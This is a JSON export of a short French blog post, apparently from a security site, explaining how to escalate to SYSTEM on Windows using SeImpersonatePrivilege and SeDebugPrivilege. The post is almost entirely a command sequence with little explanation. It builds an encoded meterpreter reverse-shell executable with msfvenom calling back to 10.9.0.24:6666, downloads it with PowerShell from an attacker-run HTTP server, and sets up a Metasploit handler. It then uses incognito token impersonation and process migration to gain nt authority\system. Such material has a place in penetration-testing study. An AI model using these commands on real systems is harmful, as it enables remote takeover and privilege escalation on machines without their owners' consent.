{"id":641,"date":"2021-07-25T09:04:54","date_gmt":"2021-07-25T14:04:54","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=641"},"modified":"2022-04-27T07:47:35","modified_gmt":"2022-04-27T12:47:35","slug":"exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/","title":{"rendered":"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege"},"content":{"rendered":"<p>Si on se rend compte que nous avons les privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter<\/p>\n<p>Nous cr\u00e9er le code initial pour avoir une session meterpreter<br \/>\n<code>msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe<\/code><\/p>\n<p>T\u00e9l\u00e9chargement du code<br \/>\n<pre><code>sudo python -m http.server 80\npowershell &quot;(New-Object System.Net.WebClient).Downloadfile(&#039;http:\/\/10.9.0.24&#039;,&#039;shell.exe&#039;)&quot;<\/code><\/pre><\/p>\n<p>Pr\u00e9paration dans msfconsole<br \/>\n<pre><code>use exploit\/multi\/handler\nset PAYLOAD windows\/meterpreter\/reverse_tcp \nset LHOST 10.9.0.24 \nset LPORT 6666 \nrun<\/code><\/pre><\/p>\n<p>Ex\u00e9cution du code<br \/>\n<code>shell.exe<\/code><\/p>\n<p>Nous avons maintenant une session dans metasploit.<br \/>\n<pre><code>load incognito\nlist_tokens -g\nimpersonate_token &quot;BUILTIN\\Administrators&quot;\ngetuid\nps #pour trouver le pid du processus services.exe\nmigrate &lt;em&gt;services_pid&lt;\/em&gt;\nshell\nwhoami #devrait \u00eatre nt authority\\system<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Si on se rend compte que nous avons les privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter Nous cr\u00e9er le code initial pour avoir une session meterpreter msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 &#8211;encoder x86\/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe T\u00e9l\u00e9chargement du code sudo python -m http.server 80 powershell &quot;(New-Object System.Net.WebClient).Downloadfile(&#039;http:\/\/10.9.0.24&#039;,&#039;shell.exe&#039;)&quot; Pr\u00e9paration dans msfconsole use exploit\/multi\/handler set PAYLOAD windows\/meterpreter\/reverse_tcp set LHOST 10.9.0.24 set LPORT 6666 run Ex\u00e9cution du code shell.exe Nous avons maintenant une session dans metasploit. load incognito list_tokens -g impersonate_token &quot;BUILTIN\\Administrators&quot; getuid ps #pour trouver le pid du processus services.exe <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,69],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Si on se rend compte que nous avons les privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter Nous cr\u00e9er le code initial pour avoir une session meterpreter msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe T\u00e9l\u00e9chargement du code sudo python -m http.server 80 powershell &quot;(New-Object System.Net.WebClient).Downloadfile(&#039;http:\/\/10.9.0.24&#039;,&#039;shell.exe&#039;)&quot; Pr\u00e9paration dans msfconsole use exploit\/multi\/handler set PAYLOAD windows\/meterpreter\/reverse_tcp set LHOST 10.9.0.24 set LPORT 6666 run Ex\u00e9cution du code shell.exe Nous avons maintenant une session dans metasploit. load incognito list_tokens -g impersonate_token &quot;BUILTINAdministrators&quot; getuid ps #pour trouver le pid du processus services.exe\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-25T14:04:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-27T12:47:35+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/\",\"name\":\"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-07-25T14:04:54+00:00\",\"dateModified\":\"2022-04-27T12:47:35+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/","og_locale":"fr_CA","og_type":"article","og_title":"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege - S\u00e9curiser votre site","og_description":"Si on se rend compte que nous avons les privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter Nous cr\u00e9er le code initial pour avoir une session meterpreter msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe T\u00e9l\u00e9chargement du code sudo python -m http.server 80 powershell &quot;(New-Object System.Net.WebClient).Downloadfile(&#039;http:\/\/10.9.0.24&#039;,&#039;shell.exe&#039;)&quot; Pr\u00e9paration dans msfconsole use exploit\/multi\/handler set PAYLOAD windows\/meterpreter\/reverse_tcp set LHOST 10.9.0.24 set LPORT 6666 run Ex\u00e9cution du code shell.exe Nous avons maintenant une session dans metasploit. load incognito list_tokens -g impersonate_token &quot;BUILTINAdministrators&quot; getuid ps #pour trouver le pid du processus services.exe","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-07-25T14:04:54+00:00","article_modified_time":"2022-04-27T12:47:35+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/","name":"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-07-25T14:04:54+00:00","dateModified":"2022-04-27T12:47:35+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/25\/exploitation-des-privileges-sedebugprivilege-seimpersonateprivilege\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Exploitation des privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/641"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=641"}],"version-history":[{"count":3,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":645,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/641\/revisions\/645"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}